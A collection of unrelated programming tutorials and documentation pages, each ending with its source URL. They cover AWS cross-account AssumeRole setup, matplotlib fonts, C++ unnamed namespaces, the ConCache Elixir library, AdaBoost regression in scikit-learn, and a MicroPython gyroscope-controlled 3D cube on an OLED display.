To perform the actions permitted by the roles, the IAM user must have permission to call the AWS STS AssumeRole API. You must edit the user-based policy for each IAM user to grant them the appropriate permissions. That is, you set a Resource element in the policy that is attached to the IAM user. The following example shows a policy for an IAM user in Account B that allows the user to assume a role named "Test" created earlier by Account A.
To attach the required policy to the IAM user
Sign in to the AWS Management Console and open the IAM console.
Choose the user whose permissions you want to modify.
Choose the Permissions tab.
Choose Custom Policy.
Choose Use the policy editor to customize your own set of permissions.
Type a name for the policy.
Copy the following policy into the space provided for the policy document.
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["sts:AssumeRole"],
      "Resource": "arn:aws:iam::account-A-id:role/Test"
    }
  ]
}
Important
Only IAM users can assume a role. If you attempt to use AWS root account credentials to assume a role, access will be denied.
Calling AssumeRole
A user in accounts B, C, or Z can assume a role by creating an application that calls the AWS STS AssumeRole API and passes the role session name, the Amazon Resource Name (ARN) of the role to assume, and an optional external ID. The role session name is defined by Account A when it creates the role to assume. The external ID, if any, is defined by Account Z and passed to Account A for inclusion during role creation. For more information, see How to Use an External ID When Granting Access to Your AWS Resources to a Third Party in the IAM User Guide. You can retrieve the ARN from Account A by opening the IAM console.
To find the ARN Value in Account A with the IAM console
Choose Roles
Choose the role you want to examine.
Look for the Role ARN in the Summary section.
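The ARN follows a fixed format, so the account ID and role name can also be pulled out of it programmatically. The helper below is purely illustrative and not part of the AWS documentation:

```python
def parse_role_arn(arn):
    # Split "arn:aws:iam::account-id:role/RoleName" into its parts.
    parts = arn.split(":")
    account_id = parts[4]
    role_name = parts[5].split("/", 1)[1]
    return account_id, role_name

print(parse_role_arn("arn:aws:iam::123456789012:role/Test"))
# -> ('123456789012', 'Test')
```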
The AssumeRole API returns temporary credentials that a user in accounts B, C, or Z can use to access resources in Account A. In this example, the resources you want to access are the Amazon S3 bucket and the log files that the bucket contains. The temporary credentials have the permissions that you defined in the role access policy.
The following Python example (using the AWS SDK for Python (Boto)) shows how to call AssumeRole and how to use the temporary security credentials returned to list all Amazon S3 buckets controlled by Account A.
import boto
from boto.sts import STSConnection
from boto.s3.connection import S3Connection

# The calls to AWS STS AssumeRole must be signed using the access key ID and secret
# access key of an IAM user or using existing temporary credentials. (You cannot call
# AssumeRole using the access key for an account.) The credentials can be in
# environment variables or in a configuration file and will be discovered automatically
# by the STSConnection() function. For more information, see the Python SDK
# documentation.
sts_connection = STSConnection()
assumedRoleObject = sts_connection.assume_role(
    role_arn="arn:aws:iam::account-of-role-to-assume:role/name-of-role",
    role_session_name="AssumeRoleSession1"
)

# Use the temporary credentials returned by AssumeRole to call Amazon S3
# and list the bucket in the account that owns the role (the trusting account)
s3_connection = S3Connection(
    aws_access_key_id=assumedRoleObject.credentials.access_key,
    aws_secret_access_key=assumedRoleObject.credentials.secret_key,
    security_token=assumedRoleObject.credentials.session_token
)
bucket = s3_connection.get_bucket(bucketname)
print bucket.name
https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-sharing-logs-assume-role.html
Here is the trick (well documented on the matplotlib webpage) to define the font family and size of what appears on your matplotlib plot:
Before calling anything related to matplotlib in your script, do:
### rcParams are the default.
Calling these lines before creating a basemap plot will also work!
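A minimal sketch of such an rcParams override (the font family and size values here are placeholders, not the post's original choices):

```python
import matplotlib

# Override the default font family and size via rcParams before creating
# any figures; all subsequent plots pick up these defaults.
matplotlib.rcParams['font.family'] = 'sans-serif'
matplotlib.rcParams['font.size'] = 14.0
```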
Note: you can permanently define the default values if you *really* prefer Comic Sans MS for all your plots, by editing the matplotlibrc file. The file is located somewhere on your disk; to find out where, just type:
import matplotlib
print matplotlib.matplotlib_fname()
gives : “c:\Python26\lib\site-packages\matplotlib\mpl-data\matplotlibrc”
which starts with :
### MATPLOTLIBRC FORMAT
# This is a sample matplotlib configuration file - you can find a copy
# of it on your system in
# site-packages/matplotlib/mpl-data/matplotlibrc. If you edit it
# there, please note that it will be overridden in your next install.
# If you want to keep a permanent local copy that will not be
# over-written, place it in HOME/.matplotlib/matplotlibrc (unix/linux
# like systems) and C:\Documents and Settings\yourname\.matplotlib
# (win32 systems).
Quite easy to understand, isn't it?
More information about Customizing Matplotlib can be found here.
https://www.geophysique.be/2010/12/07/matplotlib-fonts-plots-basemaps/
An unnamed namespace can be used to ensure names have internal linkage (can only be referred to by the current translation unit). Such a namespace is defined in the same way as any other namespace, but without the name:
namespace
{
    int foo = 42;
}
foo is only visible in the translation unit in which it appears.
It is recommended never to use unnamed namespaces in header files, as this creates a separate copy of the contents for every translation unit that includes them. This is especially important if you define non-const globals.
// foo.h
namespace
{
    std::string globalString;
}

// 1.cpp
#include "foo.h" //< Generates unnamed_namespace{1.cpp}::globalString
...
globalString = "Initialize";

// 2.cpp
#include "foo.h" //< Generates unnamed_namespace{2.cpp}::globalString
...
std::cout << globalString; //< Will always print the empty string
https://riptutorial.com/cplusplus/example/4851/unnamed-anonymous-namespaces
con_cache alternatives and similar packages
Based on the "Caching" category.
Alternatively, view con_cache alternatives based on common mentions on social networks and blogs.
- cachex - A powerful caching library for Elixir with support for transactions, fallbacks and expirations
- Nebulex - In-memory and distributed caching toolkit for Elixir
- locker - Atomic distributed "check and set" for short-lived keys
- lru_cache - ETS-based fix-sized LRU cache for Elixir
- stash - A small and user-friendly ETS wrapper for caching in Elixir
- gen_spoxy - **DEPRECATED** caching made fun!
- Mem - KV cache with TTL, Replacement and Persistence support
- jc - Erlang, in-memory distributable cache
- elixir_locker - An Elixir wrapper for the locker Erlang library that provides some useful libraries that should make using locker a bit easier
- Haphazard - A configurable plug for caching
README
ConCache
ConCache (Concurrent Cache) is an ETS based key/value storage with the following additional features:
- row level synchronized writes (inserts, read/modify/write updates, deletes)
- TTL support
- modification callbacks
Usage in OTP applications
Set up the project and app dependency in your mix.exs:
...
defp deps do
  [{:con_cache, "~> 0.13"}, ...]
end

def application do
  [applications: [:con_cache, ...], ...]
end
...
A cache can be started using the ConCache.start or ConCache.start_link functions. Both functions take two arguments - the first one being a list of ConCache options, and the second one a list of GenServer options for the process being started.
Typically you want to start the cache from a supervisor:
Supervisor.start_link(
  [
    ...
    {ConCache, [name: :my_cache, ttl_check_interval: false]}
    ...
  ],
  ...
)
For OTP apps, you can generally find this in lib/<myapp>.ex. In the Phoenix web framework, look in the start function and add the worker to the children list.
Notice the name: :my_cache option. The resulting process will be registered under this alias. Now you can use the cache as follows:
# Note: all of these requests run in the caller process, without going through
# the started process.
ConCache.put(:my_cache, key, value)         # inserts value or overwrites the old one
ConCache.insert_new(:my_cache, key, value)  # inserts value or returns {:error, :already_exists}
ConCache.get(:my_cache, key)
ConCache.delete(:my_cache, key)
ConCache.size(:my_cache)

ConCache.update(:my_cache, key, fn(old_value) ->
  # This function is isolated on a row level. Modifications such as update, put, delete,
  # on this key will wait for this function to finish.
  # Modifications on other items are not affected.
  # Reads are always dirty.
  {:ok, new_value}
end)

# Similar to update, but executes provided function only if item exists.
# Otherwise returns {:error, :not_existing}
ConCache.update_existing(:my_cache, key, fn(old_value) ->
  {:ok, new_value}
end)

# Returns existing value, or calls function and stores the result.
# If many processes simultaneously invoke this function for the same key, the function will be
# executed only once, with all others reading the value from cache.
ConCache.get_or_store(:my_cache, key, fn() ->
  initial_value
end)

# Similar to get_or_store/3 but works with :ok/:error tuples.
# The value is cached only if the function returns an :ok tuple.
ConCache.fetch_or_store(:my_cache, key, fn ->
  case call_api() do
    # The processed value will be cached and returned as an :ok tuple.
    {:ok, data} -> {:ok, process_data(data)}
    # The error tuple is propagated to the caller.
    {:error, _reason} = error -> error
  end
end)
Dirty modifiers operate directly on ETS record without trying to acquire the row lock:
ConCache.dirty_put(:my_cache, key, value)
ConCache.dirty_insert_new(:my_cache, key, value)
ConCache.dirty_delete(:my_cache, key)
ConCache.dirty_update(:my_cache, key, fn(old_value) -> ... end)
ConCache.dirty_update_existing(:my_cache, key, fn(old_value) -> ... end)
ConCache.dirty_get_or_store(:my_cache, key, fn() -> ... end)
ConCache.dirty_fetch_or_store(:my_cache, key, fn() -> ... end)
Callback
You can register your own function which will be invoked after an element is stored or deleted:
{ConCache, [name: :my_cache, callback: fn(data) -> ... end]}

ConCache.put(:my_cache, key, value)  # fun will be called with {:update, cache_pid, key, value}
ConCache.delete(:my_cache, key)      # fun will be called with {:delete, cache_pid, key}
The delete callback is invoked before the item is deleted, so you still have the chance to fetch the value from the cache and do something with it.
TTL
{ConCache, [
  name: :my_cache,
  ttl_check_interval: :timer.seconds(1),
  global_ttl: :timer.seconds(5)
]}
This example sets up item expiry check every second, and sets the global expiry for all cache items to 5 seconds. Since ttl_check_interval is 1 second, the item lifetime might be at most 6 seconds.
However, the item lifetime is renewed on every modification. Reads don't extend global_ttl, but this can be changed when starting cache:
{ConCache, [
  name: :my_cache,
  ttl_check_interval: :timer.seconds(1),
  global_ttl: :timer.seconds(5),
  touch_on_read: true
]}
In addition, you can manually renew item's ttl:
ConCache.touch(:my_cache, key)
And you can override ttl for each item:
ConCache.put(:my_cache, key, %ConCache.Item{value: value, ttl: ttl})
ConCache.update(:my_cache, key, fn(old_value) ->
  {:ok, %ConCache.Item{value: new_value, ttl: ttl}}
end)
And you can update an item without resetting the item's ttl:
ConCache.put(:my_cache, key, %ConCache.Item{value: value, ttl: :no_update})
ConCache.update(:my_cache, key, fn(old_value) ->
  {:ok, %ConCache.Item{value: new_value, ttl: :no_update}}
end)
If you use ttl value of
:infinity the item never expires.
The TTL check is not based on a brute-force table scan, and should work reasonably fast assuming the check interval is not too small. I generally recommend a ttl_check_interval of at least 1 second, possibly more, depending on the cache size and desired ttl.
If needed, you may also pass false to ttl_check_interval. This effectively stops con_cache from checking the ttl of your items:

{ConCache, [
  name: :my_cache,
  ttl_check_interval: false
]}
Supervision
A call to ConCache.start_link (or start) creates the so-called cache owner process. This is the process that owns the underlying ETS table and where TTL checks are performed. No other operation (such as get or put) runs in this process.
As you've seen from the examples above, it's your responsibility to place the cache owner process into your own supervision tree. This gives you the control of cache cleanup when some subtree terminates (since a termination of the owner process will release the ETS table).
If for some reason the :con_cache application is terminated, all cache owner processes will be terminated as well, regardless of the fact that they do not reside in the :con_cache supervision tree.
Multiple caches
Sometimes it can be useful to run multiple caches - say, if you need 2 caches with different global expiry values. Even though you can override ttl for each item individually, it might get tedious very quickly.
By default it's not possible to run multiple caches under the same supervisor, because the child specification of each cache owner process has an id equal to ConCache. However, you can override the default child specification and provide a unique id:
def start(_type, _args) do
  Supervisor.start_link(
    [
      ...
      con_cache_child_spec(:my_cache_1, 100),
      con_cache_child_spec(:my_cache_2, 200)
      ...
    ],
    ...
  )
end

defp con_cache_child_spec(name, global_ttl) do
  Supervisor.child_spec(
    {
      ConCache,
      [
        name: name,
        ttl_check_interval: :timer.seconds(1),
        global_ttl: :timer.seconds(global_ttl)
      ]
    },
    id: {ConCache, name}
  )
end
See Supervisor.child_spec/2 for details of this technique.
Process alias
The ConCache.start and ConCache.start_link functions return the standard {:ok, pid} result. You can interface with the cache using this pid. As mentioned, cache operations are not running through this process - the pid is just used to discover the corresponding ETS table.
Most of the time, using the pid to interface with the cache is not appropriate. Just like in the examples above, you usually want to give some alias to your cache and then access it via this alias. In the examples above, we used name: :some_alias to provide a local alias. Alternatively, you can use the following formats for the name option:
{:global, some_alias}      # globally registered alias
{:via, module, some_alias} # registered through some module (e.g. gproc)
In this case, you can just pass the same tuple to other ConCache functions. For example, to use the cache with gproc, you can do something like this:

ConCache.start_link([], name: {:via, :gproc, :my_cache})
...
ConCache.put({:via, :gproc, :my_cache}, :some_key, :some_value)
Testing in your application
Keep in mind that ConCache introduces state to your system. Thus, when you're testing your application, some tests might accidentally compromise the execution of other tests. There are a couple of options to work around that:
- Use different keys in each test. This could help avoiding tests compromising each other.
- Before each test, force restart the ConCache process. This will ensure each test runs with an empty cache.
setup do
  Supervisor.terminate_child(con_cache_supervisor, ConCache)
  Supervisor.restart_child(con_cache_supervisor, ConCache)
  :ok
end
Where con_cache_supervisor is the supervisor from which the ConCache process is started.
- Fetch all keys from the ets table, and delete each entry:
setup do
  :my_cache
  |> ConCache.ets
  |> :ets.tab2list
  |> Enum.each(fn({key, _}) -> ConCache.delete(:my_cache, key) end)

  :ok
end
Inner workings
ETS table
The ETS table is always public, and by default it is of set type. Some ETS parameters can be changed:
ConCache.start_link(ets_options: [
  :named_table,
  {:name, :test_name},
  :ordered_set,
  {:read_concurrency, true},
  {:write_concurrency, true},
  {:heir, heir_pid}
])
Additionally, you can override ConCache, and access ETS directly:
:ets.insert(ConCache.ets(cache), {key, value})
Of course, this completely overrides additional ConCache behavior, such as ttl, row locking and callbacks.
Bag and Duplicate Bag
Bag and duplicate bag tables are now supported by ConCache, but as with ETS, some functions are not supported for these types. Here is the list of functions not supported by bag and duplicate bag type tables:
update/3
dirty_update/3
update_existing/3
dirty_update_existing/3
get_or_store/3
dirty_get_or_store/3
fetch_or_store/3
dirty_fetch_or_store/3
Locking
To provide isolation, a custom mutex implementation is used. This ensures that each update operation is executed in the caller process, without the need to send data to another sync process.
When a modification operation is called, the ConCache first acquires the lock and then performs the operation. The acquiring is done using the pool of lock processes that reside in the ConCache supervision tree. The pool contains as many processes as there are schedulers.
If the lock is not acquired in a predefined time (default = 5 seconds, alter with acquire_lock_timeout ConCache parameter) an exception will be generated.
You can use explicit isolation to perform isolated reads if needed. In addition, you can use your own lock ids to implement bigger granularity:
ConCache.isolated(cache, key, fn() ->
  ConCache.get(cache, key)  # isolated read
end)

# Operation isolated on an arbitrary id. The id doesn't have to correspond to a cache item.
ConCache.isolated(cache, my_lock_id, fn() -> ... end)

# Same as above, but immediately returns {:error, :locked} if lock could not be acquired.
ConCache.try_isolated(cache, my_lock_id, fn() -> ... end)
Keep in mind that these calls are isolated, but not transactional (atomic). Once something is modified, it is stored in ETS regardless of whether the remaining calls succeed or fail. The isolation operations can be arbitrarily nested, although I wouldn't recommend this approach.
TTL
When ttl is configured, the owner process works in discrete steps, using :erlang.send_after to trigger the next step.
When an item ttl is set, the owner process receives a message and stores it in its internal structure without doing anything else. Therefore, repeated touching of items is not very expensive.
In the next discrete step, the owner process first applies the pending ttl set requests to its internal state. Then it checks which items must expire at this step, purges them, and calls :erlang.send_after to trigger the next step.
This approach allows the owner process to do a fairly small amount of work in each discrete step.
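The discrete-step bookkeeping described above can be sketched as follows. This is a toy Python illustration of the idea only; ConCache itself is implemented in Elixir and the names here are invented:

```python
class TtlSteps:
    """Toy sketch of interval-based expiry: pending ttl requests are
    batched and applied once per step, then due items are purged."""

    def __init__(self):
        self.current_step = 0
        self.pending = {}  # key -> ttl (in steps), recorded cheaply between steps
        self.expiry = {}   # key -> step at which the key should be purged

    def touch(self, key, ttl_steps):
        # Storing/touching an item only records the request; no scan happens here,
        # which is why repeated touching is not very expensive.
        self.pending[key] = ttl_steps

    def step(self):
        # 1. Apply all pending ttl requests accumulated since the last step.
        for key, ttl in self.pending.items():
            self.expiry[key] = self.current_step + ttl
        self.pending.clear()
        # 2. Purge everything that is due at this step.
        due = [k for k, s in self.expiry.items() if s <= self.current_step]
        for k in due:
            del self.expiry[k]
        self.current_step += 1
        return due

cache = TtlSteps()
cache.touch("a", 1)
print(cache.step())  # "a" expires at step 1, nothing due yet -> []
print(cache.step())  # "a" is now due -> ['a']
```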
Consequences
Due to the locking and ttl algorithms just described, some additional processing will occur in the owner processes. The work is fairly optimized, but I didn't invest too much time in it.
For example, lock processes currently use purely functional structures such as HashDict and :gb_trees. This could probably be replaced with an internal ETS table to make it work faster, but I didn't try it.
Due to locking and ttl inner workings, multiple copies of each key exist in memory. Therefore, I recommend avoiding complex keys.
Status
ConCache has been used in production to manage several thousands of entries served to up to 4000 concurrent clients, on the load of up to 2000 reqs/sec. I don't maintain that project anymore, so I'm not aware of its current status.
https://elixir.libhunt.com/con_cache-alternatives
AdaBoost Regression with Python
This post will share how to use the adaBoost algorithm for regression in Python. What boosting does is make multiple models in a sequential manner. Each newer model tries to successfully predict what older models struggled with. For regression, the average of the models is used for the predictions. It is most common to use boosting with decision trees, but this approach can be used with any machine learning algorithm that deals with supervised learning.
Boosting is associated with ensemble learning because several models are created and averaged together. An assumption of boosting is that combining several weak models produces a stronger overall model. In this example, we will predict the weight loss of a patient based on several independent variables. The steps of this process are as follows.
- Data preparation
- Regression decision tree baseline model
- Hyperparameter tuning of Adaboost regression model
- AdaBoost regression model development
Below is some initial code
import numpy as np
from pydataset import data
from sklearn import tree
from sklearn.ensemble import AdaBoostRegressor
from sklearn.model_selection import train_test_split, KFold, cross_val_score, GridSearchCV
from sklearn.metrics import mean_squared_error
Data Preparation
There is little data preparation for this example. All we need to do is load the data and create the X and y datasets. Below is the code.
df = data('cancer').dropna()
X = df[['time', 'sex', 'ph.karno', 'pat.karno', 'status', 'meal.cal']]
y = df['wt.loss']
We will now proceed to creating the baseline regression decision tree model.
Baseline Regression Tree Model
The purpose of the baseline model is to compare it against the performance of our model that utilizes adaBoost. In order to make this model we need to initiate a KFold cross-validation. This will help stabilize the results. Next we will create a for loop so that we can create several trees that vary based on their depth. By depth, it is meant how far the tree can go to purify the classification. More depth often leads to a higher likelihood of overfitting.
Finally, we will then print the results for each tree. The criteria used for judgment is the mean squared error. Below is the code and results
crossvalidation = KFold(n_splits=10, shuffle=True, random_state=1)  # fold count assumed; not preserved in this copy of the post

for depth in range(1, 10):
    tree_regressor = tree.DecisionTreeRegressor(max_depth=depth, random_state=1)
    if tree_regressor.fit(X, y).tree_.max_depth < depth:
        break
    score = np.mean(cross_val_score(tree_regressor, X, y, scoring='neg_mean_squared_error',
                                    cv=crossvalidation, n_jobs=1))
    print(depth, score)

1 -193.55304528235052
2 -176.27520747356175
3 -209.2846723461564
4 -218.80238479654003
5 -222.4393459885871
6 -249.95330609042858
7 -286.76842138165705
8 -294.0290706405905
9 -287.39016236497804
Looks like a tree with a depth of 2 had the lowest amount of error. We can now move to tuning the hyperparameters for the adaBoost algorithm.
Hyperparameter Tuning
For hyperparameter tuning we need to start by initiating our AdaBoostRegressor() class. Then we need to create our grid. The grid will address two hyperparameters: the number of estimators and the learning rate. The number of estimators tells Python how many models to make, and the learning rate indicates how much each tree contributes to the overall result. There is one more parameter, random_state, but this is just for setting the seed and never changes.
After making the grid, we need to use the GridSearchCV function to finish this process. Inside this function you have to set the estimator which is adaBoostRegressor, the parameter grid which we just made, the cross validation which we made when we created the baseline model, and the n_jobs which allocates resources for the calculation. Below is the code.
ada = AdaBoostRegressor()
search_grid = {'n_estimators': [500, 1000, 2000],
               'learning_rate': [.001, 0.01, .1],
               'random_state': [1]}
search = GridSearchCV(estimator=ada, param_grid=search_grid,
                      scoring='neg_mean_squared_error', n_jobs=1, cv=crossvalidation)
Next, we can run the model with the desired grid in place. Below is the code for fitting the mode as well as the best parameters and the score to expect when using the best parameters.
search.fit(X, y)

search.best_params_
Out[31]: {'learning_rate': 0.01, 'n_estimators': 500, 'random_state': 1}

search.best_score_
Out[32]: -164.93176650920856
The best mix of hyperparameters is a learning rate of 0.01 and 500 estimators. This mix led to a mean error score of 164, which is a little lower than our single decision tree of 176. We will see how this works when we run our model with the refined hyperparameters.
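To see the same baseline-versus-boosted comparison end to end, here is a self-contained sketch on synthetic data. The dataset, fold count, and scores are illustrative only and are not from the original post:

```python
import numpy as np
from sklearn.datasets import make_regression
from sklearn.ensemble import AdaBoostRegressor
from sklearn.tree import DecisionTreeRegressor
from sklearn.model_selection import KFold, cross_val_score

# Synthetic regression problem standing in for the cancer data.
X, y = make_regression(n_samples=300, n_features=6, noise=10.0, random_state=1)
cv = KFold(n_splits=5, shuffle=True, random_state=1)

baseline = DecisionTreeRegressor(max_depth=2, random_state=1)
boosted = AdaBoostRegressor(n_estimators=200, learning_rate=0.01, random_state=1)

# Negate the scores so both numbers are plain mean squared errors.
base_mse = -np.mean(cross_val_score(baseline, X, y,
                                    scoring='neg_mean_squared_error', cv=cv))
boost_mse = -np.mean(cross_val_score(boosted, X, y,
                                     scoring='neg_mean_squared_error', cv=cv))
print(base_mse, boost_mse)
```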
AdaBoost Regression Model
Below is our model but this time with the refined hyperparameters.
ada2 = AdaBoostRegressor(n_estimators=500, learning_rate=0.001, random_state=1)
score = np.mean(cross_val_score(ada2, X, y, scoring='neg_mean_squared_error',
                                cv=crossvalidation, n_jobs=1))

score
Out[36]: -174.52604137201791
You can see the score is not quite as good (note that this run used a learning rate of 0.001 rather than the 0.01 found by the grid search), but it is within reason.
Conclusion
In this post, we explored how to use the AdaBoost algorithm for regression. Employing this algorithm can often strengthen a model's predictive performance with relatively little extra code.
https://python-bloggers.com/2019/01/adaboost-regression-with-python/
This little project draws a gyroscope-controlled 3D wireframe cube on an OLED display using MicroPython, building on earlier articles covering the display and the accelerometer.
Take a look at those earlier articles if you're interested in the background basics.
Libraries
We need two Python drivers for this project — one for the 128x64 OLED display, and one for the gyroscope.
The display in this example uses the ssd1306 chip, so we can use the module available in the MicroPython repository.
The gyroscope is a MPU6050, a Python library for which is available from @adamjezek98 here on Github.
Download both files and upload them to your controller using ampy or the web REPL.
Once the libraries are in place, connect to your controller and try and import both packages. If the imports work, you should be good to go.
import ssd1306
import mpu6050
Wiring
Both the ssd1306 display and the MPU6050 gyroscope-accelerometer communicate via I2C. Helpfully they also have different addresses, so we don't need to do any funny stuff to talk to them both at the same time.
The wiring is therefore quite simple, hooking them both up to +5V/GND and connecting their SCL and SDA pins to D1 and D2 respectively.
On the boards I have, the SDA, SCL, GND and 5V pins are in reverse order when the boards are placed pins-top. Double check what you're wiring where.
Code
The project is made up of 3 parts —
- the gyroscope code to calibrate, retrieve and smooth the data
- the 3D point code to handle the positions of cube in space
- the simulation code to handle the inputs, and apply them to the 3D scene, outputting the result
First, the basic imports for I2C and the two libraries used for the display and gyro.
from machine import I2C, Pin
import ssd1306
import mpu6050
import math

i2c = I2C(scl=Pin(5), sda=Pin(4))
display = ssd1306.SSD1306_I2C(128, 64, i2c)
accel = mpu6050.accel(i2c)
Gyroscope
The gyroscope values can be a little noisy, and because of manufacturing variation (and gravity) need calibrating at rest before use.
Some standard smoothing and calibration code is shown below — to see a more thorough explanation of this see the introduction to 3-axis gyro-accelerometers in MicroPython.
First the smoothed sampling code which takes a number of samples and returns the mean average. It accepts a calibration input which provides a base value to remove from the resulting measurement.
def get_accel(samples=10, calibration=None):
    # Setup a dict of measures at 0
    result = {}
    for _ in range(samples):
        v = accel.get_values()
        for m in v.keys():
            # Add on value / samples (to generate an average)
            result[m] = result.get(m, 0) + v[m] / samples
    if calibration:
        # Remove calibration adjustment
        for m in calibration.keys():
            result[m] -= calibration[m]
    return result
The calibration code takes a number of samples, waiting for the variation to drop below threshold. It then returns this base offset for use in future calls to
get_accel.
def calibrate(threshold=50):
    print('Calibrating...', end='')
    while True:
        v1 = get_accel(100)
        v2 = get_accel(100)
        if all(abs(v1[m] - v2[m]) < threshold for m in v1.keys()):
            print('Done.')
            return v1
Point3D
The code here is based on this example for Pygame. The initial conversion of that code to MicroPython with an OLED screen and some background on the theory can be found here.
class Point3D:
    def __init__(self, x=0, y=0, z=0):
        self.x, self.y, self.z = x, y, z

    def rotateX(self, deg):
        """ Rotates this point around the X axis the given number of degrees. """
        rad = deg * math.pi / 180
        cosa = math.cos(rad)
        sina = math.sin(rad)
        y = self.y * cosa - self.z * sina
        z = self.y * sina + self.z * cosa
        return Point3D(self.x, y, z)

    def rotateY(self, deg):
        """ Rotates this point around the Y axis the given number of degrees. """
        rad = deg * math.pi / 180
        cosa = math.cos(rad)
        sina = math.sin(rad)
        z = self.z * cosa - self.x * sina
        x = self.z * sina + self.x * cosa
        return Point3D(x, self.y, z)

    def rotateZ(self, deg):
        """ Rotates this point around the Z axis the given number of degrees. """
        rad = deg * math.pi / 180
        cosa = math.cos(rad)
        sina = math.sin(rad)
        x = self.x * cosa - self.y * sina
        y = self.x * sina + self.y * cosa
        return Point3D(x, y, self.z)

    def project(self, win_width, win_height, fov, viewer_distance):
        """ Transforms this 3D point to 2D using a perspective projection. """
        factor = fov / (viewer_distance + self.z)
        x = self.x * factor + win_width / 2
        y = -self.y * factor + win_height / 2
        return Point3D(x, y, self.z)
Gyro-locked Perspective Simulation
The first demo uses the accelerometer to produce a simulated perspective view of the cube. Tilting the board allows us to see "around" the edges of the cube, as if we were looking into the scene through a window.
To detect the angle of the device we're using the accelerometer. You might think to use the gyroscope first — I did — but remember the gyroscope detects angular velocity, not angle. Measurements are zero at rest, in any orientation. You can track the velocity changes and calculate the angle from this yourself, but gradually the error will build up and the cube will end up pointing the wrong way.
Using the accelerometer we have a defined rest point (flat on the surface) from which to calculate the current rotation. Placing the device flat will always return to the initial state.
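As an aside, a common way to turn raw accelerometer readings into explicit tilt angles is atan2. This helper is illustrative only (the demo in this article simply scales the raw values instead), and the 16384 below is just an example raw reading:

```python
import math

def tilt_angles(acx, acy, acz):
    # Pitch and roll in degrees from raw accelerometer values. Only the
    # ratios matter, so raw sensor counts can be used directly.
    pitch = math.degrees(math.atan2(acx, math.sqrt(acy * acy + acz * acz)))
    roll = math.degrees(math.atan2(acy, math.sqrt(acx * acx + acz * acz)))
    return pitch, roll

# Flat at rest, gravity entirely on the z axis: no tilt.
print(tilt_angles(0, 0, 16384))  # -> (0.0, 0.0)
```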
class Simulation:
    def __init__(self, width=128, height=64, fov=64, distance=4):
        # The cube's corners, centred on the origin, and the edges that join
        # them (reconstructed here to match the second demo below).
        self.vertices = [
            Point3D(-1, 1, -1),
            Point3D(1, 1, -1),
            Point3D(1, -1, -1),
            Point3D(-1, -1, -1),
            Point3D(-1, 1, 1),
            Point3D(1, 1, 1),
            Point3D(1, -1, 1),
            Point3D(-1, -1, 1)
        ]
        self.edges = [
            (0, 1), (1, 2), (2, 3), (3, 0),  # back face
            (4, 5), (5, 6), (6, 7), (7, 4),  # front face
            (0, 4), (1, 5), (2, 6), (3, 7)   # connecting sides
        ]
        self.projection = [width, height, fov, distance]

    def run(self):
        # Starting angle (unrotated in any dimension)
        angleX, angleY, angleZ = 0, 0, 0
        calibration = calibrate()
        while 1:
            data = get_accel(10, calibration)
            angleX = data['AcX'] / 256
            angleY = data['AcY'] / 256
            t = []
            for v in self.vertices:
                # Rotate the point, then project it onto the 2D display.
                r = v.rotateX(angleX).rotateY(angleY).rotateZ(angleZ)
                t.append(r.project(*self.projection))
            display.fill(0)
            for e in self.edges:
                display.line(*to_int(t[e[0]].x, t[e[0]].y, t[e[1]].x, t[e[1]].y, 1))
            display.show()
We use a simple helper function to convert lists of float into lists of int to make updating the OLED display simpler.
def to_int(*args):
    return [int(v) for v in args]
We can create a Simulation and run it with the following.
s = Simulation()
s.run()
Leave it on a flat surface as you start it up, so the calibration can complete quickly.
Once running it should look something like the following. If you pick up the device and tilt it you should notice the perspective of the cube change, as if you were 'looking around' the side of a real 3D cube.
Making it Spin
So far we've only used the accelerometer, and the cube has remained locked in a single position. This second demo uses the gyroscope to detect angular velocity allowing you to make the cube spin by flicking the device in one direction or another.
We do this by reading the velocity and adding it along a given axis. By reducing the velocity gradually over time, we can add a sense of friction to the rotation. The result is a cube that you can flick to rotate, that will gradually come to a rest.
The idea is to mimic the effect of a cube (e.g. a dice) floating inside a ball of liquid. Rotating it quickly adds momentum, which is gradually reduced by friction.
The simulation code is given below.
class Simulation:
    def __init__(self, width=128, height=64, fov=64, distance=4,
                 inertia=10, acceleration=25, friction=1):
        # ...vertices, edges and projection are set up as in the first demo...
        # Configuration
        self.friction = friction
        self.acceleration = acceleration
        self.inertia = inertia

    def run(self):
        velocityX, velocityY, velocityZ = 0, 0, 0
        calibration = calibrate()
        while 1:
            t = []
            # Get current rotational velocity from sensor.
            data = get_accel(10, calibration)
            gyroX = -data['GyY'] / 1024
            gyroY = data['GyX'] / 1024
            gyroZ = -data['GyZ'] / 1024
            # Apply velocity, with slide for friction.
            if abs(gyroX) > self.inertia:
                velocityX = slide_to_value(velocityX, gyroX, self.acceleration)
            if abs(gyroY) > self.inertia:
                velocityY = slide_to_value(velocityY, gyroY, self.acceleration)
            if abs(gyroZ) > self.inertia:
                velocityZ = slide_to_value(velocityZ, gyroZ, self.acceleration)
            rotated = []
            for v in self.vertices:
                r = v.rotateX(velocityX).rotateY(velocityY).rotateZ(velocityZ)
                p = r.project(*self.projection)
                t.append(p)
                rotated.append(r)
            self.vertices = rotated
            display.fill(0)
            for e in self.edges:
                display.line(*to_int(t[e[0]].x, t[e[0]].y, t[e[1]].x, t[e[1]].y, 1))
            display.show()
            velocityX = slide_to_value(velocityX, 0, self.friction)
            velocityY = slide_to_value(velocityY, 0, self.friction)
            velocityZ = slide_to_value(velocityZ, 0, self.friction)
We need another helper function which handles the gradual "slide" of a given value towards its target. This is used both to smooth acceleration and to gradually bleed off velocity via friction. The maximum change per step is specified by slide.
def slide_to_value(value, target, slide):
    """
    Move value towards target, with a maximum increase of slide.
    """
    difference = target - value
    if not difference:
        return value
    sign = abs(difference) / difference  # -1 if negative, 1 if positive
    return target if abs(difference) < slide else value + slide * sign
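To see the friction behaviour in isolation, here is a small self-contained check of the helper (the function body is copied from above; the starting velocity of 5.0, target of 0 and step of 1.0 are arbitrary example values):

```python
def slide_to_value(value, target, slide):
    """Move value towards target, with a maximum change of slide."""
    difference = target - value
    if not difference:
        return value
    sign = abs(difference) / difference  # -1 if negative, 1 if positive
    return target if abs(difference) < slide else value + slide * sign

# A velocity of 5.0 bleeds off towards zero, 1.0 per step, then stays there.
v = 5.0
history = []
for _ in range(7):
    v = slide_to_value(v, 0, 1.0)
    history.append(v)
print(history)  # [4.0, 3.0, 2.0, 1.0, 0.0, 0.0, 0.0]
```

Once the value reaches the target, the early return keeps it pinned there, so the cube comes to rest rather than oscillating.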
The simulation works as follows —
